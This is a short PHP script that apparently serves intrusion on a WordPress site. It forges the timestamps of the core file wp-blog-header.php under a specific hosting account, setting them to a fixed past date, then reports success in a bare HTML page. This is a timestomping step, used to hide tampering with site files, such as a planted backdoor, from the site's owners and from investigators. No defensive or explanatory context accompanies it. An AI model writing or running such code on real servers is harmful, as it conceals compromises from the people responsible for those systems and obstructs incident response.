<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(touch('/home/pati454t/public_html/wp-blog-header.php', 1746114307, 1746114307)) echo "touched";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>"; die;